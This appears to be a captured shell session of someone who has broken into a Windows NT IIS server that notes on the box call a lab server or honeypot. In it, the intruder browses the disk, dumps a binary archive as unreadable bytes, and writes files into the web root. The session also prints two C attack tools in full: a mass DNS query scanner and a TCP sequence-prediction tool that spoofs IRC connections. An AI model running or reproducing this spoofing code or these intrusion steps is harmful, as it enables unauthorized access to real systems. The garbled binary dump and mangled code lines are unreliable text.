Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\Program Files\Common Files\system\msadc>cd .. cd .. C:\Program Files\Common Files\System> C:\Program Files\Common Files\System>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\System 12/07/00 03:23p . 12/07/00 03:23p .. 12/07/00 03:34p ado 02/04/01 07:04a msadc 12/07/00 03:34p ole db 11/11/97 12:50p 399,120 wab32.dll 6 File(s) 399,120 bytes 1,690,259,968 bytes free C:\Program Files\Common Files\System> C:\Program Files\Common Files\System>D: D: The system cannot find the drive specified. C:\Program Files\Common Files\System> C:\Program Files\Common Files\System>cd .. cd .. C:\Program Files\Common Files> C:\Program Files\Common Files>cd .. cd .. C:\Program Files> C:\Program Files>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/07/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,259,968 bytes free C:\Program Files> C:\Program Files>cd Outlook Express cd Outlook Express C:\Program Files\Outlook Express> C:\Program Files\Outlook Express>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Outlook Express 12/07/00 03:23p . 12/07/00 03:23p .. 11/11/97 10:25a 36,176 msimn.exe 10/30/97 10:19p 14,182 msimn.txt 11/11/97 10:25a 97,424 msimnimp.dll 11/11/97 12:50p 1,689,872 msimnui.dll 11/11/97 10:25a 26,144 wab.exe 11/11/97 10:25a 12,464 wabfind.dll 11/11/97 10:25a 106,752 wabimp.dll 11/11/97 10:25a 40,224 wabmig.exe 11/11/97 10:25a 48,624 _isetup.exe 11 File(s) 2,071,862 bytes 1,690,259,968 bytes free C:\Program Files\Outlook Express> C:\Program Files\Outlook Express>cd ../../ cd ../../ C:\Program Files> C:\Program Files>cd .. cd .. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> C:\>type yay.txt type yay.txt C:\> C:\>mkdir test mkdir test C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 16 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> C:\>type har.txt type har.txt MSCFÏ,I`D*ãh $$hive$$.tmpòé£~`CKí“tñ5ü¼ðŒºÙ³x?À¯†¦/ô)´Ô6c C™èùññ6h¨u9ó-PCvüpíáu ©o¢‘ù#Ü…äYE\¬óœÛè»"öŽ90r°_ÃÍÊ~ jò²ô×ZFm‡Ó Éç›þ7>NCñ‹T•ãž…„Ÿóùw,÷˜fœ|œYb|„„ù8[áÚeg=ëÏaœ„,³“‘ùårüjõþ€cžgàzá¼‹ÂZàf°ºÈøøÁq–ºá{÷ô¨c8®„oßàøÂñÇMøj#ÙüÉ†¯\Í;â€Ã\ý{'\"žŸIÓ,Å'ý—#zã|8áfcóÕvñŸ}”Í×„[úùÈZVA¨É–óµK¡oƒÏ/ÎWmgg¨¿/6ŽxñCy#‡Á%èké<[Ò×!N_~Ú‡‹LÀœÍí:AqW à¢æ¿ùCø¸^Ûð::øRWžÞÉR‹Où-o„Ÿ’óxî€Fkräx>ËÇ3ýƒç5Î+¯q,cz[iëmŠaáS-Œ_„ëËüôÕl+?=@r8=œeç§_â;…v6kä‚*/~e)ÿiþþ=ËûâøÒÅ g ü<¾í®ïÕ¾püèºÕÙÇH-©œÜËçéÄØÍî1¥èñÜÄØãmŒg³$=ŽæIþZ&é±Æ‚£=öÛ£(å‹éev¾pqŒ"³ùv8’?òÇÀ2“¿z>¥ïÕbiøkj…„ÇPø<¹‚ñ >'4òxÚU¥e¥{JËËJË*«Ë÷øÊ«*«KË*Ê½eÞ*ŸoOieUE¥wïÞê”G~YÉùô&ä¿tr ç±-—Y'§ð›VNåÉyTç/›ØäTåÿ< ”‰#Ÿ[á½…ÕYˆ¾ü¹ŸCy’¾ú4øDÒ>ÞÞR›ÑÏpž3}MS8²(Q"HCH›Þ<Ö† ÿa^Á2ºyjÌe´a'‘>E ŸŠôGc.£©7¬êk…"QÞŸ 3œïâ›WÎ[ç•ÉrEøáÊ7¾.õ° •©UŸùŸ÷hæÕæáH¨?eølË·÷›Åñ‰ï§ÁoÝ$e—“ü"ùzüÍ)vª«¬ú¸Üëú ¿vý†t>¶Ê.GãÅO&9Á^¥‡ã£Ž2œ—URßb™¶[íð`¹‰B&O½k$\¢^1Ô«Zm¯7Eù$›ç³>‹V±ëÌmìÚVhæºþ/`ký<2¿þ›ÿóÜ»öí üîgQ|—üˆÙë8 å\5^ëC¼®ãïÔgiŽËa\ëòÖí€…žëAßö‚ŽRí\ú¶—Þƒ^Ï©§ú6HÎq}Ïtt{ªLjîˆbTÿ£^ï†Ò””’w]gq>.>)š¶ØQbÍð"÷;`zƒû²3°£ìó'í¨LçïZí(ó¼ž†¹a¶S-é?óÌÔbßqŽPÖ\†|%ëãño-Fžxø¸˜¯{>.Ÿæxus¼¶SÊî²áUðÅä-üþM_|2ðz0 \€v°·çÔ29ï¹œç_ »ûv©_F”ù?¥Yç©ö‚“Ðô‡2O‡ï„ßjZ™òµ]½èÒôë–v’ÿv)§ÇÄg8\f8÷¢1a/%×Øõ«ÛØã·3ý_ë¼µ¶ÅÀÕ˜.733\§£fÙìY·Ù~›*duZ×°ë¿¦Ó»(#Ä’|¨DÒË´ß>m‰Yf…+ÇbW¢ ‹>¤M´a†ogupMºç7—†\XÆ:o8Ü™5z9Rï¶Ø%e‡|BŸû‘×Úýe£Ü_Fm1¥oj×zžé]Ùš´¹»P®â¼¤‚úV¤ü¢È×ª0ÙýZ`°rY6ªÈ²W”¾^Q|õ^’y¿†ÃÑè¢f K+¿§2D¹Pêª÷(g‡PÆ8ÈÙz›œmMÉÙÏk|nzßZ1õà;Ù^ÒÉÜZG‹£Ôt ÂlÇH)—·èoè„¯ýÔo`€=¢¾«Ý‚úŸÎ)öJ'•Üa¨Ë¾ï6ÉrmÀ ûõ/;FØƒîË/%É‰}ÿ3«º*_øýÐ¦ê}ÿ[¶-ñõºßMÿäŸ³ïÎŸéä¿ßL¬ÓóÍ;V;ºìÐ”k“P¾q½™ž‘f×Ùù(¡ð‘Sâ <(žQ¡<½Õm/+øÈj—#¬ÝëíüTÀýÄªm –ï£ª½¢øÑŠp?®{'jCyŸÉýBvK}»e}ÆüdŸ‰Ý"-²ž‘¶‹(#?)úø§^ZhÜS›˜oÉ:î7[G¨þ<ºÏ²¾m2ÓÇ$”MlµÃA×ÿ[ÿÿ÷…/¶=‘ÿêŠ/…_o}ò—W®à»*.·’\n%¹Ý'ö¼ÈŸè^È7ˆÔýo+÷ïªö1Ë-ôQŒ9Ê-ë~D8å³ËÜÐË…ìƒß¥‘mGI9N÷ÕŠS>…Ùþ5Ü(øÎ^ß×.u|äožýó¯»>?ñ“KÞÿû‡¿»ØGã-4öœ0ûqr§à}Ü¿á÷%.yßpÁõÞ{.®èŸ!Å†QîG•º£‹²ç–;ØsÅ€Og\ÎJ‡W»îZ_Mä4i!'É} æš¨æAÝÑ¿1ÓÚýRª~²—5ï*ÕÂ{Üm ¢¾ÑÓ^×[_kòqS¿ÇÏ«ÿóÒOß}ø\Ö™¿üÜ¥õ¯¾úàÐ™ßc=ùö”ÿÂDÒé½ð›£ÿ½æ®›×o®ê‘Æ™ékš)ZúUõë¨GÞ•üá‡nl·h¾~ø«¸Žç÷_pÉû—•^¯÷^ðí ß¾©ðê;ÊýU¥îÕ?ß^¹á|{ø ÙÄ·g€':(„á¯‡î·+û½Ít¸,É_…©œLäÅÅ¶oÞ1üØÛ_H¸·â/"›&ÿì½KWêÏM¼Ùfüèýìì§ÿý–¯ŒÝÿOûÞ#'©f)YË÷)Ö±këvod×Mì:YbÞÇpZgæpºïTö±6J;ò¤…'³-~F¿ûÖùËâÛö'RGb0‹à&"·“‡¶Ûýxïº¤_1±#ýþ¾<žéýŠ8NêPäpì°ÃñžKñ'ÞÅü‰;í~Î¹u±”ìOb{z"®‡›N·œ¼ïhÃñã÷²öð\Î’óâ)ù\Ê`™¥ôã¦kŒMëúƒ= ?Ñ ¾’LéàËð©mVáKÅù€}Ž1ƒŸ”ýß+–ýßð[UCÑ“7 =eóý_:5Åv¼ÍòþŸçc;ã…±íŒkv0ÜÏì`sŒ)¶5®Ñ³Öu“)Žñ°ŒcœØ¡c|M‰ûD‰ûLq‹%¥Îq‹5®ÂTÌé²kŒ[œÍ²óâÇ·8‰1^¥öuŸ—Ã£îáŠuÝ°ÒÖ°%n1Ý®=nQîájã—»½‡+hŸÕC]<0Êáck»GÊÿî4ñ„ÄOh¥c3Ôd—Ë*]Nîrƒ»õ~Œglqå^”»£»e¼–1¼úø…d…„ëÍ(õvb½rM\®ÿ½æøÿ”j‡w°þ7Üöýþ;”ýþ6…ÃÊ~u:ZYf¿?Ó¸¿k÷¥GÁÖ À·¾mPK¨zûéÎæ ƒ=S?`Ú=‡o8éÖ¥él_A"¦:ýM;ÐßN[¼JyÙà³[Æ& þ_T|×I…Þ$æ¸OLïc¼E,å…ßXÄU˜yp0oØs6—4îæ~Û2ví®`×ävÚËßW³ëìgøy“}¼¬ßñ¼ÇØA½ßW]÷#]*: œwªv>ïD,çÄ¹£ÆrþF=^ãà> ÷“ÙÎß”òQÿïóùŠ+õ¼âóº~"Myü>YËÖUu²žZ~³Rž®ÿkäúõKÁ_ùÈðw+è»!Íºq!|Bmur~•ùMhâ1s~KÇïNó=–f¾-ç/¼‹i7‘¦]·æ\‡¿VÆ»à·ÄAqÝî¿Ì¤ÿ©4ýgYâÑUünQð«‹¯qêoÚ¡?±Å™TÏ*ãô×Éq"Ýaÿ">.µ¯s€Õ©a×9~ ×òó)üš¨c×t~5'øk™^Ž%N&µÿ|óÍê··Î§“¼óˆ˜×FÉžz‰Ï/9ìÿ¨çï êÏßhèe±Ãõé÷Án•ÿ?À8DÔótÇˆŽb%Î~¢A³ÿ”\FCúý°|ëþ?ÇVÒ`‡ÇPâìý‡ž&]\cõé÷ÅpO½®½ó|XN—žm <Ó ö¸»÷ÂrÈ ¾š4ó–%Îýñƒ V¸¶¸Íç22é¯±!ý>Ó*”9‘ ‰z¬ýÞ©žƒ8äL×3<þy}þÓ,þ¬‰Åÿ/î©4pçpŸéÉ@¸'ØÉ7I'3‡Û_Æé¤%¹ˆÈ‰¡ã?lÿV·óºÔ©ÿÖFçþ—[Î[ÐøÏF{¿›zè9ë!%õL$ëïµ60Zÿ ÑT÷!†kã0›»øa6FÒh>Ÿá´OhÝva¢IÊÉ™Cr\UœkÕµ‹4£›¯ªÝéå`&ç™„êmbe×Eþ‘ýW:ô¯â«àˆ3Ÿhûmr°d>njÿ¦éWŒ¿äˆóøÕõ²)þá¨ŽºˆxñÿuÆŽ°¶Æ²Íýñý1çÏŽP(¶«+íŒÃ±`¨åOÉc>2¹èq Cž‚ìù–JkæßÏ£mø¡Œ‹¯KÏ;Bí‘®]±Á0–CýÜ«®nºöîäî2Xo–Ñ“ªþT×óðužÔlQ|”ÇùjŽ½ee:à];Ý ‰ríÁàYApé=£ÀÓêvuE.ˆõ2”³ÿ¯Œ)XšHi†«zÛMÊSºIŒ÷NÔ;Ëö{ÚûÎõ·Ÿƒ.zzÄ9çz¢¥‡zº¡R«OvÖ…ù ¶[ÚÍ¥ëï¥Ýè`4è•€3¸[H)©''èL0xýä ò®æ†yžzMórµÃ>PÚï FÃ=íƒ©Ž>K¤æzH'ÞoÉz}Øý¡ÈùT=¤Üï>N{W×èòÿAMüÈGí©QŸÍyeà_uô«ÿÈþÂ£>¿ìG;úŸo*ýðØ`7_:ê ·Ç‚Áž`lÚ÷à¾óÐÞˆÔ@ŽCNB&ß†gÈqÈS¾ã#~È#§!}×GZ!@ž†\ô$Ò9yrMúœ„L¾Ïã“~e!A&? ' ÏA®yÖ¹§ ÏB“žƒ:Ç “ç¡ää9È^˜Û8df_åÙŸyBâídÃ±Ú{9¾¼d€TÅ©‚Yýå´¾1"ë7×6kñKÕ÷eP¿M©ßÒxÂïo8™ª_ž¶þ2òÿ C:\> C:\>ÿþ‡ÿüdir ÿþ‡ÿüdir The name specified is not recognized as an internal or external command, operable program or batch file. C:\> C:\>cd exploits cd exploits C:\exploits> C:\exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits> C:\exploits>cd unix cd unix C:\exploits\unix> C:\exploits\unix>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\unix> C:\exploits\unix>cd sunos-exploits cd sunos-exploits C:\exploits\unix\sunos-exploits> C:\exploits\unix\sunos-exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\sunos-exploits 12/26/00 07:25p . 12/26/00 07:25p .. 03/23/98 10:25a 3,209 binmail.sh 03/23/98 10:25a 4,343 chup.c 03/23/98 10:25a 964 kcms.sh 03/23/98 10:25a 1,522 lastlog.c 03/23/98 10:25a 4,988 nittie.c 03/23/98 10:25a 4,622 passwdscript.sh 8 File(s) 19,648 bytes 1,690,259,968 bytes free C:\exploits\unix\sunos-exploits> C:\exploits\unix\sunos-exploits>cd .. cd .. C:\exploits\unix> C:\exploits\unix>cd .. cd .. C:\exploits> C:\exploits>cd .. cd .. C:\> C:\>echo best honeypot i've seen till now :) > rfp.txt echo best honeypot i've seen till now :) > rfp.txt C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> C:\>cd exploits cd exploits C:\exploits> C:\exploits>cd .. cd .. C:\> C:\>cd wiretrip cd wiretrip C:\wiretrip> C:\wiretrip>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\wiretrip 12/26/00 07:09p . 12/26/00 07:09p .. 12/26/00 07:04p 15,501 msadc1.pl 12/26/00 07:04p 17,865 msadc2.pl 12/26/00 07:04p 4,425 RFParalyze.c 12/26/00 07:04p 2,269 RFPickaxe.pl 12/26/00 07:05p 7,393 RFPoison.c 12/26/00 07:04p 12,450 RFPoison.zip 12/26/00 07:04p 1,792 RFProwl.c 12/26/00 07:06p 170,372 whisker.tar.gz 12/26/00 07:06p 173,427 whisker.zip 12/26/00 07:05p 25,229 whiskerids.html 12 File(s) 430,723 bytes 1,690,259,968 bytes free C:\wiretrip> C:\wiretrip>cd .. cd .. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> C:\>cd exploits cd exploits C:\exploits> C:\exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits> C:\exploits>cd newfiles cd newfiles C:\exploits\newfiles> C:\exploits\newfiles>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\newfiles 12/26/00 07:35p . 12/26/00 07:35p .. 2 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\newfiles> C:\exploits\newfiles>cd ../unix cd ../unix C:\exploits> C:\exploits>cd unix cd unix C:\exploits\unix> C:\exploits\unix>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\unix> C:\exploits\unix>cd tcp-exploits cd tcp-exploits C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\tcp-exploits 12/26/00 07:24p . 12/26/00 07:24p .. 03/23/98 10:26a 1,330 ALLHOSTS.C 03/23/98 10:26a 7,436 bounce.c 03/23/98 10:26a 4,841 CSIRCSEQ.C 03/23/98 10:26a 4,465 datapipe.c 03/23/98 10:26a 3,782 KILL-ME.C 03/23/98 10:26a 8,548 NNTPFORG.C 03/23/98 10:26a 9,372 SZ-SEQ.C 03/23/98 10:26a 5,924 TSPOOF.C 10 File(s) 45,698 bytes 1,690,259,968 bytes free C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>type ALLHOSTS.C type ALLHOSTS.C ..:-={{Collaborative Security Information Center}}=-:.. X-TREME & TECHNOTRONIC Security Collaboration Project http://www.technotronic.com -=(c)=- http://www.x-treme.abyss.com /* Mass DNS Query program for vicy, by crisk. */ #include #include #include #include #include #include void main(int argc, char *argv[]) { unsigned long current; struct hostent *host; char *curname; char thename[70]; int i,j,num; struct in_addr addr; if (argc<3) { printf("Not enough args\n"); return; } num = atoi(argv[2]); host = gethostbyname(argv[1]); if (!host) { printf("Cannot resolve starting point. Aborting.\n"); return; } current = *((unsigned long *)host->h_addr); printf("Beginning DNS lookups\n"); for (i=0;ih_name : curname); j = 0; if (host) while (host->h_aliases[j] != NULL) printf("\r%s",host->h_aliases[j++]); current += 0x01000000; printf("\n"); } printf("Ending DNS lookups.\n"); } C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\tcp-exploits 12/26/00 07:24p . 12/26/00 07:24p .. 03/23/98 10:26a 1,330 ALLHOSTS.C 03/23/98 10:26a 7,436 bounce.c 03/23/98 10:26a 4,841 CSIRCSEQ.C 03/23/98 10:26a 4,465 datapipe.c 03/23/98 10:26a 3,782 KILL-ME.C 03/23/98 10:26a 8,548 NNTPFORG.C 03/23/98 10:26a 9,372 SZ-SEQ.C 03/23/98 10:26a 5,924 TSPOOF.C 10 File(s) 45,698 bytes 1,690,259,968 bytes free C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>type CSIRCSEQ.C type CSIRCSEQ.C ..:-={{Collaborative Security Information Center}}=-:.. X-TREME & TECHNOTRONIC Security Collaboration Project http://www.technotronic.com -=(c)=- http://www.x-treme.abyss.com /* */ /* iRC SEQUENCER v0.0001 = MUTUALLY DEVELOPED BY Z AND VECT0R-X */ /* Under Solaris try: */ /* gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb */ #include "tcpip.c" unsigned long sourceport = 23; unsigned long dest, spoofed, src, nseq, tarport, temp; char *nickn, *userid, *channel, *ircname, *current; char str[255], *string; char buf[4096]; int len, rec, sen, i=1, adder=128000, stringlen=0; struct sockaddr_in addr, spoofedaddr; struct hostent *host; void main(int argc, char *argv[]) { unsigned long fakesequence = 408618+getpid(); system("clear"); printf("iRC SEQUENCE - Writtin by z and vect0rx.\n\n"); if (argc != 9) { fprintf(stderr,"Usage: %s {1|2}\n\n",argv[0]); fprintf(stderr," - Site spoof is attempted on.\n"); fprintf(stderr," - Port to access on .\n"); fprintf(stderr," - Nickname for spoof to user.\n"); fprintf(stderr," - Account name of spoof.\n"); fprintf(stderr," - Host to appear from.\n"); fprintf(stderr," - Default is (*Unknown*).\n"); fprintf(stderr," (w/o #) - Initial channel (0 for none).\n"); fprintf(stderr," 1 - Offset of 128000 (common).\n"); fprintf(stderr," 2 - Offset of 64000 (not likely).\n\n"); exit(1); } tarport = atoi(argv[2]); nickn = argv[3]; userid = argv[4]; ircname = argv[6]; channel = argv[7]; if (argv[8][0] == '2') adder=64000; memset(&spoofedaddr,0,sizeof(spoofedaddr)); spoofedaddr.sin_family = AF_INET; if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[5])) == -1) { if ((host = gethostbyname(argv[5])) == NULL) { printf("Unknown host %s.\n",argv[5]); exit(1); } spoofedaddr.sin_family = host->h_addrtype; memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length); } memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4); memset(&addr,0,sizeof(addr)); addr.sin_family = AF_INET; if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) { if ((host = gethostbyname(argv[1])) == NULL) { printf("Unknown host %s.\n",argv[1]); exit(1); } addr.sin_family = host->h_addrtype; memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length); } memcpy(&dest,(char *)&addr.sin_addr.s_addr,4); if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) { perror("error: recv socket"); exit(1); } if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: send socket"); exit(1); } /* sen = openintf("ppp0"); */ gethostname(buf, 128); if ((host=gethostbyname(buf))==NULL) { fprintf(stderr, "Can't get my hostname!?\n"); exit(1); } memcpy(&src,host->h_addr,4); sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport, tarport, fakesequence, 0, NULL, 0); for (;;) { gettcppacket(rec,buf,sizeof(buf)); ip = (struct iphdr *) buf; if (ip->saddr != dest) continue; len = ip->ihl << 2; tcp = (struct tcphdr *) (buf+len); if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) { temp=htonl(tcp->th_seq); nseq=temp; nseq+=adder; printf("Sequence returned is %lu, Offset is %lu\n", nseq, adder); sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport, tarport, fakesequence, 0, NULL, 0); break; /* out of for loop */ } } printf("%s!%s@%s on server %s:%d on channel %s\n", nickn, userid, argv[5], argv[1], tarport, channel); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport, tarport,fakesequence,0,NULL,0); printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout); usleep(10000); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport, tarport,++fakesequence,++nseq,NULL,0); printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout); usleep(5000); printf("Sending irc client handshake for %s.\n", nickn); fflush(stdout); sprintf(str,"USER %s # # :%s\r\nNICK %s\r\nJOIN #%s\r\n", userid, ircname, nickn, channel); stringlen = strlen(str); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,str,stringlen); fakesequence+=stringlen; current = channel; for(;;) { printf("vczseq:#%s> ", current); fflush(stdout); string = fgets(str, 255, stdin); stringlen = strlen(string); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,string,stringlen); fakesequence+=stringlen; } } /* */ C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>C: C: C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>cd .. cd .. C:\exploits\unix> C:\exploits\unix>cd .. cd .. C:\exploits> C:\exploits>cd .. cd .. C:\> C:\>cd .. cd .. C:\> C:\>D: D: The system cannot find the drive specified. C:\> C:\>A: A: The system cannot find the drive specified. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> C:\>type README.NOW.Hax0r type README.NOW.Hax0r Hi, i know that this a is a lab server, but patch the holes! :-) C:\> C:\>cd Program Files cd Program Files C:\Program Files> C:\Program Files>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/07/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,259,968 bytes free C:\Program Files> C:\Program Files>cd .. cd .. C:\> C:\>cd Inetpub cd Inetpub C:\InetPub> C:\InetPub>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:15a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> C:\InetPub>cd wwwroot cd wwwroot C:\InetPub\wwwroot> C:\InetPub\wwwroot>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:15a . 02/04/01 07:15a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 23 File(s) 42,748 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> C:\InetPub\wwwroot>echo test > test.txt echo test > test.txt C:\InetPub\wwwroot> C:\InetPub\wwwroot>echo this can't be true > test.txt echo this can't be true > test.txt C:\InetPub\wwwroot> C:\InetPub\wwwroot>type test.txt type test.txt this can't be true C:\InetPub\wwwroot> C:\InetPub\wwwroot>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 